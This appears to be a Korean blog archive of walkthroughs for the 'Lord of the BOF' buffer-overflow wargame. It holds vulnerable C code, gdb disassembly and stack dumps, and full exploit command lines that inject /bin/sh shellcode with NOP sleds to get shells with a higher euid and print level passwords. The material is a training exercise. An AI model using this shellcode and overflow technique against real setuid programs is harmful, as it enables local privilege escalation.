0xbffffbb8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffbc8:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffef8: "/home/vampire/tmp/./", '\220' <repeats 180 times>...
0xbfffffc0: '\220' <repeats 20 times>, "h\212aI\201h±\fSThjo\212ah\001i0chi0tij\024Yþ\f\fIyuA÷aTA"

gdb 로 스택을 살펴봤을 때, ff가 제대로 안들어가서 계속 stack friends가 뜬거였다.

redhat 6.2인것을 까먹고있었다.;

bash2로 쉘을 바꾼 후에 실행시키니 바로 패스

[vampire@localhost vampire]$ ln -s skeleton `perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`
[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44,"\x38\xff\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿8yy¿
bash$ id
uid=509(vampire) gid=509(vampire) euid=510(skeleton) egid=510(skeleton) groups=509(vampire)
bash$ my-pass
euid = 510
shellcoder
bash$

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

golem -> darkknight (0)	2014.02.20
skeleton -> golem (0)	2014.02.20
troll -> vampire (0)	2014.02.20
orge -> troll (0)	2014.02.20
darkelf->orge (0)	2014.02.20

Posted by windowhan

,

troll -> vampire

Wargame/LOB (Redhat9) 2014. 2. 20. 15:14

[troll@localhost troll]$ cat vampire.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - vampire
        - check 0xbfff
*/

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[])
{
        char buffer[40];

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // here is changed!
        if(argv[1][46] == '\xff')
        {
                printf("but it's not forever\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
}

보면 return address가 0xbfff~ 면 차단을 하고 있다.

0xbf??~~ 이런 식이어야 한다.

그렇지만 스택의 default address는 0xbfff~~ 이다.

stack size를 늘려서 0xbf??~~ 로 만들어줘야 할 것 같다.

0x8048430 <main>:       push   %ebp
0x8048431 <main+1>:     mov    %ebp,%esp
0x8048433 <main+3>:     sub    %esp,40
0x8048436 <main+6>:     cmp    DWORD PTR [%ebp+8],1
0x804843a <main+10>:    jg     0x8048453 <main+35>
0x804843c <main+12>:    push   0x8048520
0x8048441 <main+17>:    call   0x8048350 <printf>
0x8048446 <main+22>:    add    %esp,4
0x8048449 <main+25>:    push   0
0x804844b <main+27>:    call   0x8048360 <exit>
0x8048450 <main+32>:    add    %esp,4
0x8048453 <main+35>:    mov    %eax,DWORD PTR [%ebp+12]
0x8048456 <main+38>:    add    %eax,4
0x8048459 <main+41>:    mov    %edx,DWORD PTR [%eax]
0x804845b <main+43>:    add    %edx,47
0x804845e <main+46>:    cmp    BYTE PTR [%edx],0xbf
0x8048461 <main+49>:    je     0x8048480 <main+80>
0x8048463 <main+51>:    push   0x804852c
0x8048468 <main+56>:    call   0x8048350 <printf>
0x804846d <main+61>:    add    %esp,4
0x8048470 <main+64>:    push   0
0x8048472 <main+66>:    call   0x8048360 <exit>
---Type <return> to continue, or q <return> to quit---
0x8048477 <main+71>:    add    %esp,4
0x804847a <main+74>:    lea    %esi,[%esi]
0x8048480 <main+80>:    mov    %eax,DWORD PTR [%ebp+12]
0x8048483 <main+83>:    add    %eax,4
0x8048486 <main+86>:    mov    %edx,DWORD PTR [%eax]
0x8048488 <main+88>:    add    %edx,46
0x804848b <main+91>:    cmp    BYTE PTR [%edx],0xff
0x804848e <main+94>:    jne    0x80484a7 <main+119>
0x8048490 <main+96>:    push   0x8048549
0x8048495 <main+101>:   call   0x8048350 <printf>
0x804849a <main+106>:   add    %esp,4
0x804849d <main+109>:   push   0
0x804849f <main+111>:   call   0x8048360 <exit>
0x80484a4 <main+116>:   add    %esp,4
0x80484a7 <main+119>:   mov    %eax,DWORD PTR [%ebp+12]
0x80484aa <main+122>:   add    %eax,4
0x80484ad <main+125>:   mov    %edx,DWORD PTR [%eax]
0x80484af <main+127>:   push   %edx
0x80484b0 <main+128>:   lea    %eax,[%ebp-40]
0x80484b3 <main+131>:   push   %eax
0x80484b4 <main+132>:   call   0x8048370 <strcpy>
0x80484b9 <main+137>:   add    %esp,8
0x80484bc <main+140>:   lea    %eax,[%ebp-40]
---Type <return> to continue, or q <return> to quit---
0x80484bf <main+143>:   push   %eax
0x80484c0 <main+144>:   push   0x804855f
0x80484c5 <main+149>:   call   0x8048350 <printf>
0x80484ca <main+154>:   add    %esp,8
0x80484cd <main+157>:   leave
0x80484ce <main+158>:   ret
0x80484cf <main+159>:   nop

그리고 argv의 위치는. argv의 길이가 길면 길수록 앞쪽에 배치된다.

---------- //10

argv

... 등등 ebp esp

---------

~~

---------

main frame //1

Little Endian임을 명심하자.

그러기 때문에 argv가 길면 길수록 argv는 작은 주소에서 부터 시작한다.

r `perl -e 'print "\xbf"x44,"\xb1\x9c\xfe\xbf"'` `perl -e 'print "\x90"x100,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "a"x90000'`

r `perl -e 'print "\xbf"x44,"\xb1\x9c\xfe\xbf"'` `perl -e 'print "a"x90000'` `perl -e 'print "\x90"x100,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[troll@localhost troll]$ ./vampire `perl -e 'print "\xbf"x44,"\xb1\x9c\xfe\xbf"'` `perl -e 'print "\x90"x100,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "a"x90000'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿±œþ¿
bash$ my-pass
euid = 509
music world

0xbffffc20

0xbffe9c44:

0xbffe4e24

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

skeleton -> golem (0)	2014.02.20
vampire -> skeleton (0)	2014.02.20
orge -> troll (0)	2014.02.20
darkelf->orge (0)	2014.02.20
wolfman -> darkelf (0)	2014.02.20

Posted by windowhan

,

orge -> troll

Wargame/LOB (Redhat9) 2014. 2. 20. 15:12

[orge@localhost orge]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44,"\xd3\xfb\xff\xbf"'`

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿Ouy¿

bash$ id

uid=507(orge) gid=507(orge) euid=508(troll) egid=508(troll) groups=507(orge)

bash$ my-pass

euid = 508

aspirin

bash$

argv[0]을 쓰라고 형이 알려줘서 씀...

처음에는 복사해서 난항이많았지만 링크를 걸었음.

드뎌꺴꾸나

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

vampire -> skeleton (0)	2014.02.20
troll -> vampire (0)	2014.02.20
darkelf->orge (0)	2014.02.20
wolfman -> darkelf (0)	2014.02.20
orc -> wolfman (0)	2014.02.20

Posted by windowhan

,

darkelf->orge

Wargame/LOB (Redhat9) 2014. 2. 20. 15:12

0x8048529 <main+41>:    call   0x80483f0 <strlen>
0x804852e <main+46>:    add    $0x4,%esp
0x8048531 <main+49>:    mov    %eax,%eax
0x8048533 <main+51>:    cmp    $0x4d,%eax
0x8048536 <main+54>:    je     0x8048550 <main+80>
0x8048538 <main+56>:    push   $0x804869c
0x804853d <main+61>:    call   0x8048410 <printf>
0x8048542 <main+66>:    add    $0x4,%esp
0x8048545 <main+69>:    push   $0x0
0x8048547 <main+71>:    call   0x8048420 <exit>
0x804854c <main+76>:    add    $0x4,%esp
0x804854f <main+79>:    nop
0x8048550 <main+80>:    nop
0x8048551 <main+81>:    movl   $0x0,0xffffffd4(%ebp)
0x8048558 <main+88>:    mov    0xffffffd4(%ebp),%eax
0x804855b <main+91>:    lea    0x0(,%eax,4),%edx
0x8048562 <main+98>:    mov    0x80497d4,%eax
0x8048567 <main+103>:   cmpl   $0x0,(%eax,%edx,1)
0x804856b <main+107>:   jne    0x8048570 <main+112>
0x804856d <main+109>:   jmp    0x80485b0 <main+176>
0x804856f <main+111>:   nop
0x8048570 <main+112>:   mov    0xffffffd4(%ebp),%eax
0x8048573 <main+115>:   lea    0x0(,%eax,4),%edx
0x804857a <main+122>:   mov    0x80497d4,%eax
0x804857f <main+127>:   mov    (%eax,%edx,1),%edx
0x8048582 <main+130>:   push   %edx
0x8048583 <main+131>:   call   0x80483f0 <strlen>
0x8048588 <main+136>:   add    $0x4,%esp
0x804858b <main+139>:   mov    %eax,%eax
0x804858d <main+141>:   push   %eax
0x804858e <main+142>:   push   $0x0
0x8048590 <main+144>:   mov    0xffffffd4(%ebp),%eax
0x8048593 <main+147>:   lea    0x0(,%eax,4),%edx
0x804859a <main+154>:   mov    0x80497d4,%eax
0x804859f <main+159>:   mov    (%eax,%edx,1),%edx
0x80485a2 <main+162>:   push   %edx
---Type <return> to continue, or q <return> to quit---
0x80485a3 <main+163>:   call   0x8048430 <memset>
0x80485a8 <main+168>:   add    $0xc,%esp
0x80485ab <main+171>:   incl   0xffffffd4(%ebp)
0x80485ae <main+174>:   jmp    0x8048558 <main+88>
0x80485b0 <main+176>:   mov    0xc(%ebp),%eax
0x80485b3 <main+179>:   add    $0x4,%eax
0x80485b6 <main+182>:   mov    (%eax),%edx
0x80485b8 <main+184>:   add    $0x2f,%edx
0x80485bb <main+187>:   cmpb   $0xbf,(%edx)
0x80485be <main+190>:   je     0x80485d7 <main+215>
0x80485c0 <main+192>:   push   $0x80486ab
0x80485c5 <main+197>:   call   0x8048410 <printf>
0x80485ca <main+202>:   add    $0x4,%esp
0x80485cd <main+205>:   push   $0x0
0x80485cf <main+207>:   call   0x8048420 <exit>
0x80485d4 <main+212>:   add    $0x4,%esp
0x80485d7 <main+215>:   mov    0xc(%ebp),%eax
0x80485da <main+218>:   add    $0x4,%eax
0x80485dd <main+221>:   mov    (%eax),%edx
0x80485df <main+223>:   push   %edx
0x80485e0 <main+224>:   call   0x80483f0 <strlen>
0x80485e5 <main+229>:   add    $0x4,%esp
0x80485e8 <main+232>:   mov    %eax,%eax
0x80485ea <main+234>:   cmp    $0x30,%eax
0x80485ed <main+237>:   jbe    0x8048606 <main+262>
0x80485ef <main+239>:   push   $0x80486c8
0x80485f4 <main+244>:   call   0x8048410 <printf>
0x80485f9 <main+249>:   add    $0x4,%esp
0x80485fc <main+252>:   push   $0x0
0x80485fe <main+254>:   call   0x8048420 <exit>
0x8048603 <main+259>:   add    $0x4,%esp
0x8048606 <main+262>:   mov    0xc(%ebp),%eax
0x8048609 <main+265>:   add    $0x4,%eax
0x804860c <main+268>:   mov    (%eax),%edx
0x804860e <main+270>:   push   %edx
0x804860f <main+271>:   lea    0xffffffd8(%ebp),%eax
0x8048612 <main+274>:   push   %eax
0x8048613 <main+275>:   call   0x8048440 <strcpy>
0x8048618 <main+280>:   add    $0x8,%esp
0x804861b <main+283>:   lea    0xffffffd8(%ebp),%eax
0x804861e <main+286>:   push   %eax
0x804861f <main+287>:   push   $0x80486df
0x8048624 <main+292>:   call   0x8048410 <printf>
0x8048629 <main+297>:   add    $0x8,%esp
0x804862c <main+300>:   push   $0x28
0x804862e <main+302>:   push   $0x0
0x8048630 <main+304>:   lea    0xffffffd8(%ebp),%eax
0x8048633 <main+307>:   push   %eax
0x8048634 <main+308>:   call   0x8048430 <memset>
0x8048639 <main+313>:   add    $0xc,%esp
0x804863c <main+316>:   leave
---Type <return> to continue, or q <return> to quit---
0x804863d <main+317>:   ret
0x804863e <main+318>:   nop
0x804863f <main+319>:   nop
End of assembler dump.
(gdb) b *main+317
Breakpoint 1 at 0x804863d
(gdb) r aaaa
Starting program: /home/darkelf/tmp///////////////////////////////////////////////////////orge aaaa
argv[0] error

Program exited normally.
(gdb) Quit
(gdb) q
[darkelf@localhost tmp]$ ls
orge test test.c
[darkelf@localhost tmp]$ vi test.c
[darkelf@localhost tmp]$ gcc -o test test.c
[darkelf@localhost tmp]$ ./test
76[darkelf@localhost tmp]$ gdb -q /home/darkelf/tmp////////////////////////////////////////////////////////orge
(gdb) b *main+317
Breakpoint 1 at 0x804863d
(gdb) r aaa
Starting program: /home/darkelf/tmp////////////////////////////////////////////////////////orge aaa
stack is still your friend.

Program exited normally.
(gdb) `python -c 'print "\xbf"*44+"\x6c\xfd\xbf\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
Undefined command: "". Try "help".
(gdb) r `python -c 'print "\xbf"*44+"\x6c\xfd\xbf\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
Starting program: /home/darkelf/tmp////////////////////////////////////////////////////////orge `python -c 'print "\xbf"*44+"\x6c\xfd\xbf\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿lý¿¿

Breakpoint 1, 0x804863d in main ()
(gdb) x/100x $esp
0xbffff96c:     0xbfbffd6c      0x00000000      0xbffff9b4      0xbffff9c4
0xbffff97c:     0x40013868      0x00000003      0x08048450      0x00000000
0xbffff98c:     0x08048471      0x08048500      0x00000003      0xbffff9b4
0xbffff99c:     0x08048390      0x0804866c      0x4000ae60      0xbffff9ac
0xbffff9ac:     0x40013e90      0x00000003      0xbffffaaa      0xbffffaf8
0xbffff9bc:     0xbffffb29      0x00000000      0xbffffc6e      0xbffffc90
0xbffff9cc:     0xbffffc9a      0xbffffca8      0xbffffcc7      0xbffffcd7
0xbffff9dc:     0xbffffcee      0xbffffd0b      0xbffffd16      0xbffffd24
0xbffff9ec:     0xbffffd67      0xbffffd7a      0xbffffd8f      0xbffffd9f
0xbffff9fc:     0xbffffdac      0xbffffdcb      0xbffffdd6      0xbffffde3
0xbffffa0c:     0xbffffdeb      0x00000000      0x00000003      0x08048034
0xbffffa1c:     0x00000004      0x00000020      0x00000005      0x00000006
0xbffffa2c:     0x00000006      0x00001000      0x00000007      0x40000000
0xbffffa3c:     0x00000008      0x00000000      0x00000009      0x08048450
0xbffffa4c:     0x0000000b      0x000001fa      0x0000000c      0x000001fa
0xbffffa5c:     0x0000000d      0x000001fa      0x0000000e      0x000001fa
0xbffffa6c:     0x00000010      0x0febfbff      0x0000000f      0xbffffaa5
0xbffffa7c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffa8c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffa9c:     0x00000000      0x00000000      0x38366900      0x682f0036
0xbffffaac:     0x2f656d6f      0x6b726164      0x2f666c65      0x2f706d74
0xbffffabc:     0x2f2f2f2f      0x2f2f2f2f      0x2f2f2f2f      0x2f2f2f2f
0xbffffacc:     0x2f2f2f2f      0x2f2f2f2f      0x2f2f2f2f      0x2f2f2f2f
0xbffffadc:     0x2f2f2f2f      0x2f2f2f2f      0x2f2f2f2f      0x2f2f2f2f
0xbffffaec:     0x2f2f2f2f      0x6f2f2f2f      0x00656772      0xbfbfbfbf
(gdb)
0xbffffafc:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffb0c:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffb1c:     0xbfbfbfbf      0xbfbfbfbf      0xbfbffd6c      0x90909000
0xbffffb2c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb3c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb4c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb5c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb6c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb7c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb8c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb9c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbac:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbbc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbcc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbdc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbec:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbfc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc0c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc1c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc2c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc3c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc4c:     0x90909090      0x90909090      0x50c03190      0x732f2f68
0xbffffc5c:     0x622f6868      0xe3896e69      0xe1895350      0xcd0bb099
0xbffffc6c:     0x00000080      0x00000000      0x00000000      0x00000000
0xbffffc7c:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb) Quit
(gdb) q
The program is running. Exit anyway? (y or n) y
[darkelf@localhost tmp]$ ./home/darkelf/tmp/////////////////////////////////////
bash: ./home/darkelf/tmp///////////////////////////////////////////////////////o
[darkelf@localhost tmp]$ .//////////////////////////////////////////////////////
stack is still your friend.
[darkelf@localhost tmp]$ .//////////////////////////////////////////////////////
argv error
[darkelf@localhost tmp]$ .//////////////////////////////////////////////////////
argv error
[darkelf@localhost tmp]$ .//////////////////////////////////////////////////////                                                                                                                     //////////////////orge `python -c 'print "\xbf"*44+"\x8c\xfb\xff\xbf"'` `python                                                                                                                      -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\x                                                                                                                     e3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿Œû
Illegal instruction (core dumped)
[darkelf@localhost tmp]$ bash2
[darkelf@localhost tmp]$ `python -c 'print "\xbf"*44+"\x6c\xfd\xbf\xbf"'` `pytho                                                                                                                     n -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89                                                                                                                     \xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
bash2: ¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿lý¿¿: command not found
[darkelf@localhost tmp]$
[darkelf@localhost tmp]$ .//////////////////////////////////////////////////////                                                                                                                     //////////////////orge `python -c 'print "\xbf"*44+"\x8c\xfb\xff\xbf"'` `python                                                                                                                      -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\x                                                                                                                     e3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿Œûÿ¿
bash$ id
uid=506(darkelf) gid=506(darkelf) groups=506(darkelf)
bash$ exit
exit
[darkelf@localhost tmp]$ cd ../
[darkelf@localhost darkelf]$ .//////////////////////////////////////////////////                                                                                                                     //////////////////////orge `python -c 'print "\xbf"*44+"\x8c\xfb\xff\xbf"'` `pyt                                                                                                                     hon -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x                                                                                                                     89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿Œûÿ¿
bash$
bash$ id
uid=506(darkelf) gid=506(darkelf) euid=507(orge) egid=507(orge) groups=506(darke                                                                                                                     lf)
bash$ whoami
orge
bash$ my-pass
euid = 507
timewalker
bash$
bash$

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

troll -> vampire (0)	2014.02.20
orge -> troll (0)	2014.02.20
wolfman -> darkelf (0)	2014.02.20
orc -> wolfman (0)	2014.02.20
gremlin -> cobolt (0)	2014.02.20

Posted by windowhan

,

wolfman -> darkelf

Wargame/LOB (Redhat9) 2014. 2. 20. 15:11

A ㅏ... 월요일 새벽 상쾌함의 극치를 달렸다.

마땅히 손에 잡히는것도 없고해서 BOF원정대를 풀려고햇는데 Aㅏ...

쉘코드넣었는데 한방에 풀렸다 아하하하핳 자반볶음에 밥비벼먹어야지

이번에는 argv[1]의 길이를 제한했었는데 argv[2]에 쉘코드넣고 리턴어드레스만 그쪽으로 돌려놨다

페이로드는 다음과 같다

`python -c 'print "\xbf"*44+"\x6c\xfd\xff\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

좀 잘린 로그...랄까?

Starting program: /home/wolfman/tmp/attackme `python -c 'print "\xbf"*44+"\xec\x

fc\xbf\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68

\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜賃옜

Breakpoint 1, 0x8048617 in main ()

(gdb) x/100x $esp-100

0xbffffb28: 0xfffffe7d 0x4005d920 0x400143e0 0xbffffb4c

0xbffffb38: 0x40066070 0x40106980 0x4000ae60 0xbffffbd4

0xbffffb48: 0xbffffb88 0x08048613 0xbffffb60 0x00000000

0xbffffb58: 0x00000028 0x00000013 0x00000000 0x00000000

0xbffffb68: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb78: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb88: 0xbfbfbfbf 0xbfbffcec 0x00000000 0xbffffbd4

0xbffffb98: 0xbffffbe4 0x40013868 0x00000003 0x08048450

0xbffffba8: 0x00000000 0x08048471 0x08048500 0x00000003

0xbffffbb8: 0xbffffbd4 0x08048390 0x0804864c 0x4000ae60

0xbffffbc8: 0xbffffbcc 0x40013e90 0x00000003 0xbffffcc7

0xbffffbd8: 0xbffffce2 0xbffffd13 0x00000000 0xbffffe58

0xbffffbe8: 0xbffffe7a 0xbffffe84 0xbffffe92 0xbffffeb1

0xbffffbf8: 0xbffffec1 0xbffffeda 0xbffffef7 0xbfffff01

0xbffffc08: 0xbfffff0f 0xbfffff52 0xbfffff65 0xbfffff7a

0xbffffc18: 0xbfffff8a 0xbfffff97 0xbfffffb6 0xbfffffc1

0xbffffc28: 0xbfffffce 0xbfffffd6 0x00000000 0x00000003

0xbffffc38: 0x08048034 0x00000004 0x00000020 0x00000005

0xbffffc48: 0x00000006 0x00000006 0x00001000 0x00000007

0xbffffc58: 0x40000000 0x00000008 0x00000000 0x00000009

0xbffffc68: 0x08048450 0x0000000b 0x000001f9 0x0000000c

0xbffffc78: 0x000001f9 0x0000000d 0x000001f9 0x0000000e

0xbffffc88: 0x000001f9 0x00000010 0x0febfbff 0x0000000f

0xbffffc98: 0xbffffcc2 0x00000000 0x00000000 0x00000000

---Type <return> to continue, or q <return> to quit---

0xbffffca8: 0x00000000 0x00000000 0x00000000 0x00000000

(gdb)

(gdb) x/100x $esp-500

0xbffff998: 0x40000000 0x00000000 0x400139d0 0x00000000

0xbffff9a8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff9b8: 0x40013a08 0x40013a00 0x400139d8 0x400139e0

0xbffff9c8: 0x400139e8 0x00000000 0x00000000 0x00000000

0xbffff9d8: 0x400139f0 0x400139f8 0x00000000 0x00000000

0xbffff9e8: 0x400139d0 0x40029b0e 0xbffffac0 0x400081e6

0xbffff9f8: 0x40029ad5 0x40029ad5 0x40013868 0x400143e0

0xbffffa08: 0x00004388 0x40013868 0x40029b0e 0xbffffae4

0xbffffa18: 0x400081e6 0x40029ad5 0x40029ad5 0x40013868

0xbffffa28: 0x400143e0 0x0000785c 0x400081e6 0x40029ad5

0xbffffa38: 0x080482f9 0x40013868 0x40013ed0 0x00000021

0xbffffa48: 0x00000075 0x4001ad70 0x00007080 0x40029b0e

0xbffffa58: 0xbffffb28 0x00000000 0x40029ad5 0x40021df0

0xbffffa68: 0x00000708 0x40021fd0 0x4001ad70 0x400143e0

0xbffffa78: 0x00000003 0x40014650 0x00000001 0xbffffa9c

0xbffffa88: 0x40021df0 0x400145e4 0x0d790266 0xbffffb18

0xbffffa98: 0x4002982c 0x40021df0 0x400143e0 0x400140d4

0xbffffaa8: 0x077905a6 0xbffffb30 0x08048275 0x4001b630

0xbffffab8: 0x400143e0 0x400143e0 0x40014650 0x00000001

0xbffffac8: 0xbffffae0 0x08048184 0x400140d4 0x078e530f

0xbffffad8: 0xbffffb5c 0x080482d0 0x40021ca0 0xbffffb1c

0xbffffae8: 0x4000a7fd 0x400143d0 0x400146b0 0x00000007

0xbffffaf8: 0x4000a74e 0x401081ec 0x4000ae60 0xbffffbd4

0xbffffb08: 0x400143e0 0x40021df0 0x401088c0 0x4002982c

---Type <return> to continue, or q <return> to quit---

0xbffffb18: 0x40021df0 0xbffffb4c 0x4000a970 0xbffffd13

(gdb) x/100x $ebp-300

0xbfbfbe93: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbea3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbeb3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbec3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbed3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbee3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbef3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf03: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf13: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf23: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf33: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf43: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf53: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf63: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf73: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf83: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf93: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbfa3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbfb3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbfc3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbfd3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbfe3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbff3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfc003: 0x00000000 0x00000000 0x00000000 0x00000000

---Type <return> to continue, or q <return> to quit---

0xbfbfc013: 0x00000000 0x00000000 0x00000000 0x00000000

(gdb) x/100x $ebp-300

0xbfbfbe93: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbea3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbeb3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbec3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbed3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbee3: 0x00000000 0x00000000 0x00000000 0x00000000

